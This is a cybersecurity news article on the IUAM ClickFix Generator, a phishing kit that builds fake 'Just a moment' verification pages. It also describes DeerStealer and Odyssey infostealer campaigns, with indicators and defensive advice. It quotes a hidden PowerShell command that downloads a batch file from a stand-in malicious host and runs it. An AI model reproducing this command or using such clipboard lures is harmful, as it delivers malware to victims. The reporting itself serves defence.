Friday, September 11, 2026

New Phishing Kit Automates ClickFix Attacks to Evade Security Defenses

Cybercriminals are increasingly automating one of the most insidious social engineering exploits—forcing victims to manually execute malware under the guise of browser verification.

The newly discovered IUAM ClickFix Generator commoditizes the ClickFix technique into an easy-to-use phishing kit, lowering the barrier for threat actors of all skill levels and enabling widespread deployment of information stealers and remote access Trojans (RATs).

First observed on July 18, 2025, the IUAM ClickFix Generator is hosted on an HTTP server at 38.242.212[.]5 and remains active into October.

Built with an Express.js backend and styled using Tailwind CSS, the web application mimics legitimate “Just a moment…” browser verification pages deployed by CDNs and cloud security platforms.

Through a simple user interface, attackers can configure every aspect of the lure: page title, domain name, custom messages, widget text, footer notes, popover prompts, and success or error screens.

Advanced options enable JavaScript-based clipboard injection, OS detection, and automatic obfuscation of core scripts.

User interface for the IUAM ClickFix Generator phishing kit.
User interface for the IUAM ClickFix Generator phishing kit.

Upon clicking the fake CAPTCHA checkbox, the malicious JavaScript copies a payload command directly to the victim’s clipboard.

The page then prompts the user to paste and run the command in a terminal or command prompt, effectively turning the victim into an unwitting accomplice.

Clipboard contents can be tailored for Windows or macOS, ensuring cross-platform compatibility and convenience for the attacker.

powershellpowershell -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest -Uri hxxp://malicious.example.com/cv.bat -OutFile $env:TEMP\cv.bat; Start-Process -FilePath $env:TEMP\cv.bat"

From DeerStealer to Odyssey

One campaign leveraged the IUAM ClickFix Generator to deploy DeerStealer. The attacker omitted OS detection, offering only a PowerShell command.

When victims clicked the checkbox, a popover instructed them to open the Run dialog (Win+R), paste the command, and press Enter.

DOM structure showing the command copied to victim clipboard.
DOM structure showing the command copied to victim clipboard.

The batch script (cv.bat, SHA256: 2b74674587a65cfc9c2c47865ca8128b4f7e47142bd4f53ed6f3cb5cf37f7a6b) downloaded and executed a malicious MSI (SHA256: ead6b1f0add059261ac56e9453131184bc0ae2869f983b6a41a1abb167edf151) that installed the DeerStealer infostealer.

In a separate cluster of activity, variants of the kit delivered the Odyssey infostealer for macOS and an unidentified Windows strain.

Campaign 2 - ClickFix page delivering Odyssey for macOS.
Campaign 2 – ClickFix page delivering Odyssey for macOS.

These multi-platform pages parsed the browser’s navigator.userAgent string to choose the appropriate payload. Some versions included a benign decoy command for non-targeted OSes or fallback instructions if detection failed.

In multi-platform variants, attackers serve Windows users a malicious PowerShell command designed to download and execute an unidentified malware strain. 

 DOM structure showing a multi-platform example.
 DOM structure showing a multi-platform example.

Domains hosting these variants included tradingview.connect-app[.]us[.]com, treadingveew.last-desk[.]org, and claudflurer[.]com.

Shared HTML structure, consistent JavaScript function names, and common C2 infrastructure strongly indicate all of these phishing pages were generated by a common toolkit or its derivatives.

Russian leftover developer comment.
Russian leftover developer comment.

Developer comments in Russian—such as “Добавить вызов stats.php при загрузке страницы” (Add a call to stats.php when the page loads)—further reveal a single codebase underlying these clandestine operations.

Defenses and Recommendations

Palo Alto Networks customers benefit from multiple layers of defense against ClickFix campaigns. Advanced URL Filtering and Advanced DNS Security block known malicious domains and URLs.

The Advanced WildFire machine-learning models have been updated with indicators from this research. Cortex XDR and XSIAM detect and mitigate payload execution across endpoints. Organizations suspecting compromise should engage the Unit 42 Incident Response team immediately.

The emergence of the IUAM ClickFix Generator underscores the growing trend of phishing-as-a-service. By automating sophisticated social engineering techniques, this kit enables low-effort, high-impact attacks.

Vigilance and user education are paramount: never trust prompts instructing manual command execution, and always verify the legitimacy of browser verification challenges before interacting.

Follow us on Google NewsLinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.

Mayura Kathir
Mayura Kathirhttps://gbhackers.com/
Mayura Kathir is a cybersecurity reporter at GBHackers News, covering daily incidents including data breaches, malware attacks, cybercrime, vulnerabilities, zero-day exploits, and more.

Hot this week

How To Access Dark Web Anonymously and know its Secretive and Mysterious Activities

What is Deep Web The deep web, invisible web, or...

How to Build and Run a Security Operations Center (SOC Guide) – 2023

Today’s Cyber security operations center (CSOC) should have everything...

Russian Hackers Bypass EDR to Deliver a Weaponized TeamViewer Component

TeamViewer's popularity and remote access capabilities make it an...

Web Server Penetration Testing Checklist – 2026

Web server pentesting is performed under three significant categories: identity,...

ATM Penetration Testing – Advanced Testing Methods to Find The Vulnerabilities

ATM Penetration testing, Hackers have found different approaches to...

OpenMatter Network Realigns Leadership Team to Accelerate Global Commercial Growth

Melbourne, Florida, September 10th, 2026, CyberNewswire With its Verification Architecture...

Hackers Can Turn Vulnerable LiteLLM AI Gateways Into Root Access and Cloud Credential Theft

Nearly one in 10 internet-exposed LiteLLM AI gateways accepted...

Skullcandy Dime 3 Bluetooth Flaw Lets Nearby Attackers Hijack Audio and Microphone

Skullcandy Dime 3 wireless earbuds have a serious vulnerability...

Hackers Steal Active Directory Password Hashes Without Attacking Domain Controllers Directly

Threat actors are increasingly exploiting Active Directory replication mechanisms...

Fake GTA 6 Installer Steals Browser Passwords, Discord Tokens and Crypto Data From Gamers

Threat actors are exploiting anticipation around Grand Theft Auto...

Apple Xcode Integer Underflow Flaw Lets Crafted Archives Leak Memory and Crash Builds

A recently disclosed integer-underflow vulnerability in Apple’s modern Mach-O...

Palo Alto PAN-OS Buffer Overflow Lets Attackers Execute Arbitrary Code as Root

Palo Alto Networks has announced a high-severity buffer overflow...

New Phishing Attack Uses Blob URLs to Hide Malicious Pages From Security Scanners

A phishing campaign that moves the credential-harvesting page out...

Related Articles

Recent News